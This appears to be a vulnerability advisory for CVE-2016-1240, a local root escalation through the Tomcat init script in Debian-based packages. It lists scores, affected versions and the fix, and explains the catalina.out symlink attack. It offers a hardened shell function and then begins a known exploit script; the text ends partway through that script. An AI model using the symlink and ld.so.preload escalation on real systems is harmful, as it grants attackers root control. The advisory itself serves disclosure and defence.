CVSS3: 7.8 High
Attack Vector: LOCAL
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS2: 7.2 High
Access Vector: LOCAL
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
EPSS: 0.0004 Low
Percentile: 8.2%
While everyone was celebrating the National Day holiday, on 1 October Tomcat disclosed a local privilege escalation vulnerability, CVE-2016-1240. An attacker holding only the low-privileged Tomcat user account can use it to gain root privileges on the system. Exploitation is not difficult, so affected users should pay particular attention.
Tomcat is an application server that runs alongside Apache and provides a container for Servlet/JSP applications. It can be regarded as an Apache extension, although Tomcat can in fact also run independently of Apache.
Vulnerability ID: CVE-2016-1240
Affected versions:
Tomcat 8
Tomcat 7
Tomcat 6
Affected systems include Debian and Ubuntu; other systems that use the corresponding deb packages may also be affected.
Fix:
The Debian security team has fixed the affected packages; update the system to the latest Tomcat package version it provides.
Vulnerability overview:
Administrators of Debian-based Linux systems typically manage packages with apt-get. CVE-2016-1240 is a problem in the Tomcat deb packages: installing Tomcat from the deb package automatically installs, as root, the startup script /etc/init.d/tomcat*. Through this script, an attacker holding only the low-privileged Tomcat user account can obtain root privileges. The relevant lines of the script are:
set +e
touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out
A local attacker running as the tomcat user (for example, after exploiting a vulnerability in a deployed web application) can replace catalina.out with a symbolic link pointing to any file on the system. When the Tomcat init script, which runs as root, next opens catalina.out after a service restart, it follows the link, and the attacker can obtain root privileges.
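A hardened variant of the two init-script lines above, added here as an example (it is not the Debian package's actual patch): `prepare_log FILE OWNER` is an assumed function name, it refuses to act on a symlink or on a file not already owned by the service account, and it creates a missing log with O_EXCL so that root never follows a link planted in the tomcat-writable logs directory.

```shell
#!/bin/sh
# Added example (not the Debian package's own fix): a hardened replacement
# for the init-script lines 'touch ... catalina.out' / 'chown $TOMCAT7_USER ...'.
# Assumed usage: prepare_log FILE OWNER, called by root, with the service
# account as OWNER. It never dereferences FILE, so a symlink planted by the
# service user cannot redirect root's chown to an arbitrary file.

prepare_log() {
    file="$1"
    owner="$2"

    # A symlink at the log path is exactly the CVE-2016-1240 condition: refuse.
    if [ -L "$file" ]; then
        echo "prepare_log: refusing, $file is a symlink -> $(readlink "$file")" >&2
        return 1
    fi

    if [ -e "$file" ]; then
        # An existing path must be a regular file already owned by the service
        # account. The owner check also rejects a hard link to a root-owned
        # file such as /etc/passwd, which the -L test alone would not catch.
        if [ ! -f "$file" ]; then
            echo "prepare_log: refusing, $file is not a regular file" >&2
            return 1
        fi
        if [ -z "$(find "$file" -prune -user "$owner")" ]; then
            echo "prepare_log: refusing, $file is not owned by $owner" >&2
            return 1
        fi
    else
        # Create with noclobber (O_CREAT|O_EXCL): a regular file or a link to
        # one that appears between the checks above and this open makes the
        # open fail instead of being followed, unlike a plain 'touch'.
        ( set -C; : > "$file" ) 2>/dev/null || {
            echo "prepare_log: refusing, $file appeared between check and create" >&2
            return 1
        }
    fi

    # -h (POSIX): act on the directory entry itself, never on a link target.
    chown -h "$owner" "$file"
}
```

The remaining gap is that root still operates inside a directory the service user can write to; running the touch/chown as the service user itself (or logging via a root-owned directory) removes that exposure entirely.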
Vulnerability PoC:
#!/bin/bash
BACKDOORSH="/bin/bash"
BACKDOORPATH="/tmp/tomcatrootsh"
PRIVESCLIB="/tmp/privesclib.so"
PRIVESCSRC="/tmp/privesclib.c"
SUIDBIN="/usr/bin/sudo"
# Cleanup handler: removes the temporary files and empties ld.so.preload
function cleanexit {
    echo -e "\n[+] Cleaning up..."
    rm -f $PRIVESCSRC
    rm -f $PRIVESCLIB
    rm -f $TOMCATLOG
    touch $TOMCATLOG
    if [ -f /etc/ld.so.preload ]; then
        echo -n > /etc/ld.so.preload 2>/dev/null
    fi
    echo -e "\n[+] Job done. Exiting with code $1 \n"
    exit $1
}
# Ctrl-C handler
function ctrl_c() {
    echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
    cleanexit 0
}
#intro
echo -e "\033[94m \nTomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\nCVE-2016-1240\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"
# Usage check: the path to catalina.out is required
if [ $# -lt 1 ]; then
    echo -e "\n[!] Exploit usage: \n\n$0 path_to_catalina.out [-deferred]\n"
    exit 3
fi
if [ "$2" = "-deferred" ]; then
    mode="deferred"